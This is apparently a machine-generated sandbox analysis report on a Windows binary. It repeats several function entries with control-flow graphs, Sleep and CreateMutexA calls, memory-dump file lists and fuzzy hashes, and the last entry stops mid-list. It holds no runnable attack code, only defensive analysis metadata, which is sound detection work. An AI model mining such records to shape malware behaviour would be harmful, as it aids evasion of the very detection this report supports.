                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 148 6ba079-6ba099 152 6ba09b-6ba0a7 148->152 153 6ba0c7-6ba0e3 148->153 156 6ba0a9-6ba0b7 152->156 157 6ba0bd-6ba0c4 call 6cd663 152->157 154 6ba111-6ba130 153->154 155 6ba0e5-6ba0f1 153->155 160 6ba15e-6ba916 call 6c80c0 154->160 161 6ba132-6ba13e 154->161 158 6ba0f3-6ba101 155->158 159 6ba107-6ba10e call 6cd663 155->159 156->157 162 6ba930-6ba994 call 6e6c6a Sleep CreateMutexA 156->162 157->153 158->159 158->162 159->154 166 6ba140-6ba14e 161->166 167 6ba154-6ba15b call 6cd663 161->167 178 6ba9a7-6ba9a8 162->178 179 6ba996-6ba998 162->179 166->162 166->167 167->160 179->178 180 6ba99a-6ba9a5 179->180 180->178
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 8ce4a9049e0dacca44891d1d424132b5b7214fef0db5debaf25ff63ece8ec837
                                                                                                                                                                                                                                                            • Instruction ID: 9df5fec23e574575e9a6bd6386a3a38efe8427617978bd3bc8227eae01652a3b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ce4a9049e0dacca44891d1d424132b5b7214fef0db5debaf25ff63ece8ec837
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EA3107B17101009BEB18EBACDD85BEDB763EB85314F24821DE014D73D5C77559C18726
                                                                                                                                                                                                                                                            Function 006BA1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 182 6ba1ae-6ba1ce 186 6ba1fc-6ba218 182->186 187 6ba1d0-6ba1dc 182->187 190 6ba21a-6ba226 186->190 191 6ba246-6ba265 186->191 188 6ba1de-6ba1ec 187->188 189 6ba1f2-6ba1f9 call 6cd663 187->189 188->189 196 6ba935 188->196 189->186 192 6ba228-6ba236 190->192 193 6ba23c-6ba243 call 6cd663 190->193 194 6ba293-6ba916 call 6c80c0 191->194 195 6ba267-6ba273 191->195 192->193 192->196 193->191 199 6ba289-6ba290 call 6cd663 195->199 200 6ba275-6ba283 195->200 203 6ba953-6ba994 Sleep CreateMutexA 196->203 204 6ba935 call 6e6c6a 196->204 199->194 200->196 200->199 211 6ba9a7-6ba9a8 203->211 212 6ba996-6ba998 203->212 204->203 212->211 214 6ba99a-6ba9a5 212->214 214->211
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 41320aeb149e6c9fa5507fe61679a68b97fdec89a1e1e126f304932539b947b0
                                                                                                                                                                                                                                                            • Instruction ID: 00b74cf4e184d23d86724c78ca934e069d2697a4c139ddb7bc01da6da8b64910
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 41320aeb149e6c9fa5507fe61679a68b97fdec89a1e1e126f304932539b947b0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 213118B1B101009BEB18EBACDC89BEDB763EB85310F24822DE014DB3D5D77659C18726
                                                                                                                                                                                                                                                            Function 006BA418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 216 6ba418-6ba438 220 6ba43a-6ba446 216->220 221 6ba466-6ba482 216->221 224 6ba448-6ba456 220->224 225 6ba45c-6ba463 call 6cd663 220->225 222 6ba4b0-6ba4cf 221->222 223 6ba484-6ba490 221->223 229 6ba4fd-6ba916 call 6c80c0 222->229 230 6ba4d1-6ba4dd 222->230 227 6ba492-6ba4a0 223->227 228 6ba4a6-6ba4ad call 6cd663 223->228 224->225 231 6ba93f-6ba949 call 6e6c6a * 2 224->231 225->221 227->228 227->231 228->222 235 6ba4df-6ba4ed 230->235 236 6ba4f3-6ba4fa call 6cd663 230->236 247 6ba94e 231->247 248 6ba949 call 6e6c6a 231->248 235->231 235->236 236->229 249 6ba953-6ba994 Sleep CreateMutexA 247->249 250 6ba94e call 6e6c6a 247->250 248->247 252 6ba9a7-6ba9a8 249->252 253 6ba996-6ba998 249->253 250->249 253->252 254 6ba99a-6ba9a5 253->254 254->252
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 3522ea895389e2fee3128632f38f415c47f59030a08d7e0a393a0c16575f9289
                                                                                                                                                                                                                                                            • Instruction ID: 67542b0d7cf90f034658a8b0610a2b6e4a01646fa5139a1febf8d5aa6cd7950e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3522ea895389e2fee3128632f38f415c47f59030a08d7e0a393a0c16575f9289
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E93128B1B102409BEB18ABBCD889BEDB7A3EF81314F20822CE054DB3D5D77559C08766
                                                                                                                                                                                                                                                            Function 006BA54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 256 6ba54d-6ba56d 260 6ba59b-6ba5b7 256->260 261 6ba56f-6ba57b 256->261 264 6ba5b9-6ba5c5 260->264 265 6ba5e5-6ba604 260->265 262 6ba57d-6ba58b 261->262 263 6ba591-6ba598 call 6cd663 261->263 262->263 266 6ba944-6ba949 call 6e6c6a 262->266 263->260 268 6ba5db-6ba5e2 call 6cd663 264->268 269 6ba5c7-6ba5d5 264->269 270 6ba632-6ba916 call 6c80c0 265->270 271 6ba606-6ba612 265->271 283 6ba94e 266->283 284 6ba949 call 6e6c6a 266->284 268->265 269->266 269->268 276 6ba628-6ba62f call 6cd663 271->276 277 6ba614-6ba622 271->277 276->270 277->266 277->276 286 6ba953-6ba994 Sleep CreateMutexA 283->286 287 6ba94e call 6e6c6a 283->287 284->283 290 6ba9a7-6ba9a8 286->290 291 6ba996-6ba998 286->291 287->286 291->290 292 6ba99a-6ba9a5 291->292 292->290
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
